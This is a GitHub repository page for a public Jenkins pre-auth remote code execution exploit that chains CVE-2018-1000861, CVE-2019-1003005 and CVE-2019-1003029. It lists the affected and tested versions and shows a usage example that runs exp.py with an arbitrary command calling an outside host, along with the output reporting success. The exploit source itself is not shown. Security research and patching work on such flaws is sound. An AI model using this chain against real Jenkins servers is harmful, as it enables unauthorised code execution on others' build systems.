Skip to content
There is no pre-auth RCE in Jenkins since May 2017, but this is the one!
Branch: master
Clone or download
Latest commit b07e9c0 May 17, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
img fix pic May 10, 2019
README.md Fix typo May 15, 2019
exp.py fix typo & bad ssl warnings May 10, 2019

README.md

awesome-jenkins-rce-2019

There is no pre-auth RCE in Jenkins since May 2017, but this is the one!

It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!

Affect list

  • ANONYMOUS_READ disable

    • Jenkins version < 2.138
  • ANONYMOUS_READ enable(or with a normal user account)

    • Jenkins build time < 2019-01-28

Usage

$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Tested on

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 with ANONYMOUS_READ enable
  • Jenkins 2.152 with ANONYMOUS_READ enable
  • Jenkins 2.153 with ANONYMOUS_READ enable
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Acknowledgements

Part slides from my HITB AMS 2019 talk:

1.png 2.png 3.png

References

You can’t perform that action at this time.